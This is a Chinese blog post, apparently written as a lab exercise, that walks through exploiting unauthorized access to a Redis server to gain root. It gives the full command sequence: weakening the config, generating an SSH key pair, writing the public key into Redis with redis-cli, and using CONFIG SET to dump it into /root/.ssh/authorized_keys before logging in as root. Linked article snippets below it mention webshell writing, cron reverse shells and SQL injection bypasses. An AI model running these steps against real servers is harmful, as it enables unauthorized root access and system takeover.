redis未授权访问漏洞

已于 2022-12-02 09:38:27 修改
阅读量312 收藏
点赞数 1
文章标签: Redis 未授权访问 漏洞利用 SSH密钥对 root权限
于 2022-11-30 10:23:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57823902/article/details/128110457
版权

#redis未授权访问漏洞
当redis服务器出现未授权访问问题,使用一台客户机利用未授权访问缺陷拿到redis服务器的root权限(采用ssh密钥对方式,往redis服务器中存放黑客主机的公钥,黑客主机可以使用自己的私钥直接登录redis服务器)

  • 详细步骤

    • 将配置文件中的bind监听注释,将受保护模式关掉

      #bind 127.0.0.1 -::1
protected-mode no

    • 在客户机上创建ssh密钥对

      ssh-keygen -t ras

    • 在服务器root下创建.ssh

      mkdir .ssh

    • 在客户机上将id_rsa.pub的值存入文件中,添加空格防止乱码

      [root@centOS-2 ~]# (echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt

    • 将key.txt的值写入靶机中

      [root@centOS-2 ~]# cat ~/.ssh/key.txt | redis-cli -h 192.168.29.134 -p 6370 -x set xxx

    • 将xxx文件放入对应目录

      192.168.29.134:6370> CONFIG SET dir /root/.ssh/
192.168.29.134:6370> CONFIG SET dbfilename authorized_keys

    • 测试连接

      [root@centOS-2 ~]# ssh root@192.168.29.134
Last login: Tue Nov 29 23:36:15 2022 from 192.168.29.129
顾北清歌翰“
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
redis漏洞修复:(CNVD-2019-21763)
大新新大浩浩的博客
09-22 907
redis漏洞修复:(CNVD-2019-21763) docker形式运行的redis的防火墙规则配置
Redis 授权访问 写入webshell记录
qq_38053759的博客
04-08 871
Redis 授权访问 写入webshell记录 准备环境: win10(192.168.39.52): 小皮面板(redis) kali(192.168.39.191):redis 1.Redis安装 win10:安装小皮面板,利用小皮面板安装redis。软件管理》工具,点击安装即可。 点击redis设置,系统默认绑定IP为:127.0.0.1,改为0.0.0.0(默认绑定本地的话远程无法访问redis,故设置为0.0.0.0,即所有IP均可访问) 配置完成到首页启动redis即可.
漏洞复现 - - - 授权访问漏洞Redis
weixin_67503304的博客
08-13 4698
授权访问漏洞Redis, 通过redis数据备份功能,往WEB网站根目录写入一句话木马,利用shell得到WEB网站权限,通过定时任务反弹Shell,写SSH公钥,实现免密登录linux服务器
Redis授权访问漏洞
weixin_45253622的博客
05-07 4064
Redis Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、 Key-Value数据库。和Memcached类似,它支持存储的value 类型相对更多,包括 string(字符串)、list ( 链表)、 set(集合)、zset(sorted set – 有序集合)和 hash(哈希类型)。这些数据类型都支持push/pop 、 add/remove 及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上, redis支持各种不同方式的排序。与 me
E044-服务漏洞利用及加固-利用redis授权访问漏洞进行提权.pdf
12-02
本文主要涉及的是网络安全领域中的一个常见问题,即如何利用Redis授权访问漏洞进行提权。Redis是一款开源的、高性能的键值数据库,常用于数据缓存和快速数据处理。当Redis配置不当,允许授权的外部访问时,攻击...
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问服务器的人都可以尝试连接Redis。特别是...
验证docker的Redis镜像也存在授权访问漏洞
12-04 255
看到了这篇老外的博客:Over 30% of Official Images in Docker Hub Contain High Priority Security Vulnerabilities 于是,结合最近爆出的redis授权访问导致可远程获得服务器权限漏洞,在docker容器中验证官方pull的镜像是否存在漏洞。 我的docker安装...
redis授权访问漏洞【vulhub靶场】复现
m0_55854679的博客
08-01 787
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上;如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹
docker搭建redis授权访问漏洞环境
weixin_30617695的博客
04-04 604
这是redis授权访问漏洞环境,可以使用该环境练习重置/etc/passwd文件从而重置root密码 环境我已经搭好放在了docker hub 可以使用命令docker search ju5ton1y来搜索该镜像 构建好容器之后需进入容器对ssh服务重启 /etc/init.d/ssh restart Dockerfile如下: #Redis is not authori...
JDBC详细使用
m0_73627305的博客
08-09 501
​ JDBC是一种标准,一种规则,主要作用是使用java语言操作数据库的​ JDBC这个标准中有很多的接口,接口中有很多方法。
seatunnel2.3.3在centos7上安装
鑫哥
08-09 852
安装前需要准备点环境,因为seatunnel是基于java开发的,因此需要先安装java,我这里使用的java1.8,可以网上搜索下java安装教程,记得配置JAVA_HOME环境变量。在安装的过程中需要用到mysql命令,因此也需要安装下MySQL环境,这里也不具体讲解了,在网上搜索安装就行。接下来就是正式安装seatunnel了,
LangChain与Elasticsearch向量数据库的完美结合
python1234_的博客
08-13 984
在过去的一年中,生成式 AI (Generative AI) 领域取得了显著的进展。许多新的服务和工具应运而生。其中,LangChain 已成为构建大语言模型 (LLM) 应用程序(例如检索增强生成 (RAG) 系统)最受欢迎的框架之一。该框架极大地简化了原型开发,并使开发者能够轻松实验不同的模型和检索系统。最近Elasticsearch将其集成从社区包升级为官方的 LangChain 合作伙伴包。这一升级使得在 LangChain 应用程序中引入 Elasticsearch 功能变得更加简便。
11、MySQL-SQL优化
nibabaoo的博客
08-12 91
1、Using filesort:通过表的索引或全表扫描,读取满足条件的数据行,然后在排序缓冲区sort bufer中完成排序操作,所有不是通过索引直接返回排序结果的排序都叫 FileSort 排序。一个常见又非常头疼的问题就是 limit 2000000,10,此时需要MySQL排序前2000010记录,仅仅返回2000000-2000010的记录,其他记录丢弃,查询排序的代价非常大。:表锁适用于操作频繁但对并发要求较低的场景,或者当表上的操作是大范围的(例如,清空整个表)时。
springboot民办高校科研项目管理系统-计算机毕业设计源码54009
VX_DZbishe的博客
08-11 463
论文主要是对基于springboot的民办高校科研项目管理系统进行了介绍,包括研究的现状,还有涉及的开发背景,然后还对系统的设计目标进行了论述,还有系统的需求以及整个的设计方案,对系统的设计以及实现,也都论述的比较细致,最后对基于springboot的民办高校科研项目管理系统进行了一些具体测试。本次报告,首先分析了研究的背景、作用、意义,为研究工作的合理性打下了基础。
RedisRedis 初探:特性、应用场景与高并发架构演进之路
最新发布
Hsusan的博客
08-13 574
在进⾏技术学习过程中,由于⼤部分读者没有经历过⼀些中⼤型系统的实际经验,导致⽆法从全局理解⼀些概念,所以本⽂以⼀个 “电⼦商务” 应⽤为例,介绍从⼀百个到千万级并发情况下服务端的架构的演进过程,同时列举出每个演进阶段会遇到的相关技术,让⼤家对架构的演进有⼀个整体的认知,⽅便⼤家对后续知识做深⼊学习时有⼀定的整体视野。
贷齐乐系统sql注入漏洞
banliyaoguai的博客
08-12 380
然后在这里取值的时候.和_会区分开,然后我们可以在第一个i_d写我们的payload,在i.d写正常数据用来绕过waf。可以使用使用php小特性和全局污染绕过,在这里的时候会将.转换成下划线,然后桡骨第一个waf。这里由于等号被过滤乐所以使用like,然后查表名的时候由于'被过滤所以使用了16进制编码。首先php在遇到两个相同名字参数时,php是取后一个的,如下图最终i_d的值为1。代码先走这里将输入的数据进行过滤。然后再继续往下走,再进行一个查询。然后继续往下,用=进行分割。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值